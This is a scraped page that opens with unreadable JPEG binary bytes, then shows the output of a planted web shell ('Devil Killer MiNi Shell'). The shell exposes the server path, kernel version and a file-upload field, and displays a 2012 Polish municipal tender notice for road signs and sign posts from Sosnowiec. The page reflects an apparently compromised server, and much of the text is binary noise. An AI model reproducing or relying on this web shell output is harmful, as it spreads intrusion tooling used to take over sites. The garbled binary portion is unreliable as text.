JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121228/273487-N-2012.html

<p class="kh_header"><b>Sosnowiec: Dostawa (sprzedaż wraz z transportem) znaków i tablic drogowych do pionowego oznakowania , 	konstrukcji wsporczych wraz z elementami montażowymi do znaków i tablic</b><br>
<b>Numer ogłoszenia: 273487 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Ulic i Mostów , ul. Plonów 22/I, 41-200 Sosnowiec, woj. śląskie, tel. 032 2917928, 2917922, 2917562, faks 032 2917960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa (sprzedaż wraz z transportem) znaków i tablic drogowych do pionowego oznakowania , 	konstrukcji wsporczych wraz z elementami montażowymi do znaków i tablic.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:
I.	TARCZ ZNAKÓW DROGOWYCH o wartości do 140 000,00 zł NETTO
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 70% oszacowanej   i podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy.	Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany niniejszej umowy.
Przedmiot zamówienia swym zakresem obejmuje następujące znaki drogowe:
a.) z kategorii A, B, C, D, E, F, G, T, i U ;R 
b.) wykonanych z blachy stalowej ocynkowanej o grubości minimum 1,5 mm spełniającej parametry normy: PN - 89-H-92I25 - Blacha ocynkowana;
c.) krawędzie tarcz powinny być podwójnie gięte na całym obwodzie, bez wycięć, nacięć i przewężeń na narożach
d.) tablice drogowskazowe w kształcie strzały winny być wykonane z wyokrąglonymi narożami oraz grotem
e.) tarcza znaku bezwzględnie wyposażona w poziome profile usztywniające (prowadnice) wykonane z kształtowników aluminiowych;
f.) prowadnice winny być przystosowane do zamocowania elementów montażowych, zespalających tarczę z konstrukcją wsporczą (słupkiem).
g.) ze względu na własności świetlne znaków odblaskowych z folii II typu, która posiada aprobatę techniczną, folia odblaskowa użyta do wykonana znaków i tablic musi posiadać odpowiednie właściwości odblasku przez minimum 7 lat dla folii II typu; przy czym dla tablic E wymaga się folii typu II i III o właściwościach jak wyżej
h.) każdy powtarzalny symbol znaku w ilości przekraczającej 5 szt. oraz obwódki znaków muszą być wykonane metodą sitodruku przy zastosowaniu farb odpowiednich dla typu i rodzaju folii odblaskowych zapewniających odporność na działanie promieniowania UV i trwałość nie krótszą niż trwałość folii.
i.)	stronę bierną znaku tj. tylną stronę tarczy zabezpieczoną antykorozyjnie lakierem w kolorze RAL 7037 (kolor drogowy).
j.)	przed nałożeniem lakieru powierzchnia blachy powinna być poddana obróbce chemicznej polegającej na naniesieniu dodatkowej warstwy antykorozyjnej w 	postaci powłoki chromianowej, anodowej lub innej posiadającej podobne 
parametry odporności na testy komory solnej i klimatycznej. 
k.)	Powłoki lakiernicze muszą spełniać warunki normy PN-88-C-8I523 oraz PN-76C-8I52I,
l.) każdy dostarczony znak, tablica, czy element winien posiadać informację umożliwiającą identyfikację wyrobu i Wytwórcy przez cały okres użytkowania wyrobu (sposób identyfikacji należy szczegółowo opisać i załączyć do oferty).
ł.)	wszystkie dostarczane wyroby winny być opakowane w sposób zabezpieczający przed uszkodzeniem w czasie transportu i montażu. 
m.)	realizacja usługi odbywać się będzie według częściowych zamówień w ciągu 5 dni od dnia powiadomienia aż do wyczerpania środków finansowych tj. kwoty, do wysokości której zawarto umowę.
n.)	podstawą płatności będą ceny jednostkowe skalkulowane przez wykonawcę za jednostkę obmiarową ustaloną w załączniku Nr 1.1 ZP 1-2013. 
o.) 	Dostawca jest zobowiązany do posiadania aprobaty technicznej na stałe odblaskowe znaki drogowe - APROBATĘ należy zamieścić w ofercie.
p.)	Zamawiający zastrzega sobie skierowanie losowo wybranego znaku do zbadania czy spełnia parametry określone w  Wymaganiach Zamawiającego.
Dopuszcza się wykonanie następujących badań:
a. grubości płyty znaku, 
b. wymiarów geometrycznych płyty znaku,
c. powłoki malarskiej tylnej strony znaku,
d. dotyczące parametrów folii odblaskowej.
W przypadku uzyskania negatywnych wyników badań Zamawiający wdroży postępowanie przewidziane prawem i będzie dochodził swoich roszczeń z tego tytułu. Jeżeli wynik badań określony zostanie jako negatywny wówczas koszt badania ponosi Dostawca.

Część II
II.	KONSTRUKCJI WSPORCZYCH DLA ZNAKÓW DROGOWYCH I TABLIC INFORMACYJNYCH (WRAZ Z ELEMENTAMI MONTAŻOWYMI) o wartości do 
	80 000,00 ZŁ NETTO 
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 70% oszacowanej   i podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany niniejszej umowy.
Przedmiot zamówienia swym zakresem obejmuje następujące elementy:
a	słupki o przekrojach zgodnie z załącznikiem Nr 1.2 ZP 1-2013 wykonane z kształtowników stalowych o profilu zamkniętym - PROSTOKĄTNYM Z DASZKIEM (jednostronnym stalowym).
	zgodnych z normą DIN-EN 10219-97 (odpowiednikiem wymienionej normy jest norma PN-EN 10219 część I i II) ; 
b.	słupki o przekroju fi 60 mm wykonane z rur stalowych o profilu zamkniętym - OKRĄGŁYM Z DASZKIEM JEDNOSTRONNYM STALOWYM).
	zgodnych z normą PN-H-742001998
	INNE WYMAGANIA:
1.	Konstrukcje wsporcze powinny być bezwzględnie zabezpieczone antykorozyjnie poprzez cynkowanie ogniowe zgodnie z normą DIN 50976 (PN-93-E-04500-powłoki ochronne cynkowane zanurzeniowo).
Powłoka cynku powinna być pokryta przynajmniej dwoma warstwami powłoki malarskiej - przygotowanej wg normy PN-71-H-97053. Przy czym powłoka malarska winna być przystosowana do konstrukcji stalowych ocynkowanych zgodnie z przywołaną normą, w technologii analogicznej jak dla barier łukowatych - pkt IV.
2.	Wymaga się, aby każda konstrukcja wsporcza posiadała informację umożliwiającą identyfikację wyrobu i Wytwórcy przez cały okres użytkowania wyrobu (sposób identyfikacji należy szczegółowo opisać i załączyć do oferty Załącznik Nr 1.3).
3.	Konstrukcje wsporcze powinny posiadać element do mocowania, np. kryzę, kotwę, płytę podstawy - dowolnie.
4.	Gwarancja na wszystkie elementy stanowiące przedmiot zamówienia nie powinna być krótsza niż 7 lat. Nie obejmuje ona :
uszkodzeń mechanicznych powstałych nie z winy Wykonawcy;
uszkodzeń powstałych na skutek działania czynników szkodliwych (kwasy, rozpuszczalniki, obce lakiery);
niewłaściwej eksploatacji elementów albo niezgodnej z ich przeznaczeniem;
5.	Wykonawca (Dostawca) zobowiąże się dostarczać każdorazowo przedmiot zamówienia na własny koszt w sposób zabezpieczający przed uszkodzeniem             w czasie transportu do bazy Zamawiającego.

B.2.	TERMIN REALIZACJI ZAMÓWIENIA od dnia podpisania umowy do 31.12.2013r.
B.3.	WYMAGANIA OGÓLNE:
3.1.	Dostawca zobowiąże się dostarczać każdorazowo przedmiot zamówienia na własny koszt (dlatego w cenę materiału należy wkalkulować koszt transportu).
3.2.	Zamówienia będą odbywać się partiami wg uzgodnień z Wykonawcą, którego oferta zostanie wybrana do realizacji.
3.3.	Wykonawca dostarczy każdorazowo zamówienie do bazy Miejskiego Zakładu Ulic       i Mostów, 41-200 Sosnowiec, ul. Plonów 22-I.
3.4.	Dostawca zobowiązany jest do realizacji zamówienia w czasie nie dłuższym niż 7 dni od zamówienia faxem od zamawiającego, przy czym dla znaków: A-7, B-2, B-20 i D-6 przewiduje się tryb awaryjny - realizacja zamówienia w czasie nie dłuższym niż 12 godzin od zamówienia j.w..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 34.92.84.70-3, 34.99.22.00-9, 34.92.84.60-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w warunków dokonana zostanie na zasadzie spełnia- nie spełnia, poprzez szczegółowa analizę treści ofert, w oparciu o informację zawarte w dokumentach i oświadczeniach, które Wykonawca winien załaczyć do złożonej oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w warunków dokonana zostanie na zasadzie spełnia- nie spełnia, poprzez szczegółowa analizę treści ofert, w oparciu o informację zawarte w dokumentach i oświadczeniach, które Wykonawca winien załaczyć do złożonej oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w warunków dokonana zostanie na zasadzie spełnia- nie spełnia, poprzez szczegółowa analizę treści ofert, w oparciu o informację zawarte w dokumentach i oświadczeniach, które Wykonawca winien załaczyć do złożonej oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w warunków dokonana zostanie na zasadzie spełnia- nie spełnia, poprzez szczegółowa analizę treści ofert, w oparciu o informację zawarte w dokumentach i oświadczeniach, które Wykonawca winien załaczyć do złożonej oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w warunków dokonana zostanie na zasadzie spełnia- nie spełnia, poprzez szczegółowa analizę treści ofert, w oparciu o informację zawarte w dokumentach i oświadczeniach, które Wykonawca winien załaczyć do złożonej oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aprobata techniczna IBDIM na stałe znaki drogowe</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuim.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-200 Sosnowiec, ul. Plonów 22/1 pokój nr 15, biurowiec I pietro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2013 godzina 12:45, miejsce: 41-200 Sosnowiec, ul. Plonów 22/1 , sekretariat, biurowiec I pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawę (sprzedaż wraz z transportem)znaków i tablic drogowych do pionowego oznakowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	TARCZ ZNAKÓW DROGOWYCH o wartości do 140 000,00 zł NETTO
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 70% oszacowanej   i podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy.	Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany niniejszej umowy.
Przedmiot zamówienia swym zakresem obejmuje następujące znaki drogowe:
a.) z kategorii A, B, C, D, E, F, G, T, i U ;R 
b.) wykonanych z blachy stalowej ocynkowanej o grubości minimum 1,5 mm spełniającej parametry normy: PN - 89-H-92I25 - Blacha ocynkowana;
c.) krawędzie tarcz powinny być podwójnie gięte na całym obwodzie, bez wycięć, nacięć i przewężeń na narożach
d.) tablice drogowskazowe w kształcie strzały winny być wykonane z wyokrąglonymi narożami oraz grotem
e.) tarcza znaku bezwzględnie wyposażona w poziome profile usztywniające (prowadnice) wykonane z kształtowników aluminiowych;
f.) prowadnice winny być przystosowane do zamocowania elementów montażowych, zespalających tarczę z konstrukcją wsporczą (słupkiem).
g.) ze względu na własności świetlne znaków odblaskowych z folii II typu, która posiada aprobatę techniczną, folia odblaskowa użyta do wykonana znaków i tablic musi posiadać odpowiednie właściwości odblasku przez minimum 7 lat dla folii II typu; przy czym dla tablic E wymaga się folii typu II i III o właściwościach jak wyżej
h.) każdy powtarzalny symbol znaku w ilości przekraczającej 5 szt. oraz obwódki znaków muszą być wykonane metodą sitodruku przy zastosowaniu farb odpowiednich dla typu i rodzaju folii odblaskowych zapewniających odporność na działanie promieniowania UV i trwałość nie krótszą niż trwałość folii.
i.)	stronę bierną znaku tj. tylną stronę tarczy zabezpieczoną antykorozyjnie lakierem w kolorze RAL 7037 (kolor drogowy).
j.)	przed nałożeniem lakieru powierzchnia blachy powinna być poddana obróbce chemicznej polegającej na naniesieniu dodatkowej warstwy antykorozyjnej w 	postaci powłoki chromianowej, anodowej lub innej posiadającej podobne 
parametry odporności na testy komory solnej i klimatycznej. 
k.)	Powłoki lakiernicze muszą spełniać warunki normy PN-88-C-8I523 oraz PN-76C-8I52I,
l.) każdy dostarczony znak, tablica, czy element winien posiadać informację umożliwiającą identyfikację wyrobu i Wytwórcy przez cały okres użytkowania wyrobu (sposób identyfikacji należy szczegółowo opisać i załączyć do oferty).
ł.)	wszystkie dostarczane wyroby winny być opakowane w sposób zabezpieczający przed uszkodzeniem w czasie transportu i montażu. 
m.)	realizacja usługi odbywać się będzie według częściowych zamówień w ciągu 5 dni od dnia powiadomienia aż do wyczerpania środków finansowych tj. kwoty, do wysokości której zawarto umowę.
n.)	podstawą płatności będą ceny jednostkowe skalkulowane przez wykonawcę za jednostkę obmiarową ustaloną w załączniku Nr 1.1 ZP 1-2013. 
o.) 	Dostawca jest zobowiązany do posiadania aprobaty technicznej na stałe odblaskowe znaki drogowe - APROBATĘ należy zamieścić w ofercie.
p.)	Zamawiający zastrzega sobie skierowanie losowo wybranego znaku do zbadania czy spełnia parametry określone w  Wymaganiach Zamawiającego.
Dopuszcza się wykonanie następujących badań:
a. grubości płyty znaku, 
b. wymiarów geometrycznych płyty znaku,
c. powłoki malarskiej tylnej strony znaku,
d. dotyczące parametrów folii odblaskowej.
W przypadku uzyskania negatywnych wyników badań Zamawiający wdroży postępowanie przewidziane prawem i będzie dochodził swoich roszczeń z tego tytułu. Jeżeli wynik badań określony zostanie jako negatywny wówczas koszt badania ponosi Dostawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 34.99.22.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa (sprzedaż wraz z transporte	konstrukcji wsporczych wraz z elementami montażowymi do znaków i tablic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II.	KONSTRUKCJI WSPORCZYCH DLA ZNAKÓW DROGOWYCH I TABLIC INFORMACYJNYCH (WRAZ Z ELEMENTAMI MONTAŻOWYMI) o wartości do 
	80 000,00 ZŁ NETTO 
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 70% oszacowanej   i podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany niniejszej umowy.
Przedmiot zamówienia swym zakresem obejmuje następujące elementy:
a	słupki o przekrojach zgodnie z załącznikiem Nr 1.2 ZP 1-2013 wykonane z kształtowników stalowych o profilu zamkniętym - PROSTOKĄTNYM Z DASZKIEM (jednostronnym stalowym).
	zgodnych z normą DIN-EN 10219-97 (odpowiednikiem wymienionej normy jest norma PN-EN 10219 część I i II) ; 
b.	słupki o przekroju fi  60 mm wykonane z rur stalowych o profilu zamkniętym - OKRĄGŁYM Z DASZKIEM JEDNOSTRONNYM STALOWYM).
	zgodnych z normą PN-H-742001998
	INNE WYMAGANIA:
1.	Konstrukcje wsporcze powinny być bezwzględnie zabezpieczone antykorozyjnie poprzez cynkowanie ogniowe zgodnie z normą DIN 50976 (PN-93-E-04500-powłoki ochronne cynkowane zanurzeniowo).
Powłoka cynku powinna być pokryta przynajmniej dwoma warstwami powłoki malarskiej - przygotowanej wg normy PN-71-H-97053. Przy czym powłoka malarska winna być przystosowana do konstrukcji stalowych ocynkowanych zgodnie z przywołaną normą, w technologii analogicznej jak dla barier łukowatych - pkt IV.
2.	Wymaga się, aby każda konstrukcja wsporcza posiadała informację umożliwiającą identyfikację wyrobu i Wytwórcy przez cały okres użytkowania wyrobu (sposób identyfikacji należy szczegółowo opisać i załączyć do oferty Załącznik Nr 1.3).
3.	Konstrukcje wsporcze powinny posiadać element do mocowania, np. kryzę, kotwę, płytę podstawy - dowolnie.
4.	Gwarancja na wszystkie elementy stanowiące przedmiot zamówienia nie powinna być krótsza niż 7 lat. Nie obejmuje ona :
uszkodzeń mechanicznych powstałych nie z winy Wykonawcy;
uszkodzeń powstałych na skutek działania czynników szkodliwych (kwasy, rozpuszczalniki, obce lakiery);
niewłaściwej eksploatacji elementów albo niezgodnej z ich przeznaczeniem;
